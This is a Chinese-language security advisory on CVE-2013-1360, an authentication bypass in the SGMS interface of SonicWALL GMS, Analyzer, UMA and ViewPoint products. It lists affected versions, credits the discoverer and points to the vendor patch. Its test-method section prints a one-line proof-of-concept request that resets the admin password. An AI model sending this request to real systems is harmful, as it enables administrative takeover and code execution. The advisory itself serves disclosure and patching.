安全研究
安全漏洞
多个SonicWALL产品SGMS接口身份验证绕过漏洞
发布日期:2013-01-17
更新日期:2013-01-21
受影响系统:SonicWALL GMS/Analyzer/UMA 7.0.x
SonicWALL GMS/Analyzer/UMA 6.0.x
SonicWALL GMS/Analyzer/UMA 5.1.x
SonicWALL GMS/ViewPoint 5.0.x
SonicWALL GMS/ViewPoint 4.1.x
描述:
BUGTRAQ ID:
57446
CVE(CAN) ID:
CVE-2013-1360
SonicWALL 提供面向中小型企业与分布式企业的互联网安全解决方案。
SonicWALL Global Management System (GMS), ViewPoint, Universal Management Appliance (UMA), Analyzer在实现上存在身份验证绕过漏洞,通过发送特制请求到SGMS接口,攻击者可利用此漏洞以管理员权限访问Web接口,导致以系统级别权限执行任意代码。
<*来源:Nikolas Sotiriu
链接:
http://securitytracker.com/id/1028007
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/sgms/auth?clientHash=765c5e5b571050030b63666663383064663 83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092 4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000 00000000001
建议:
厂商补丁:
SonicWALL
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.sonicwall.com浏览次数:4061
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
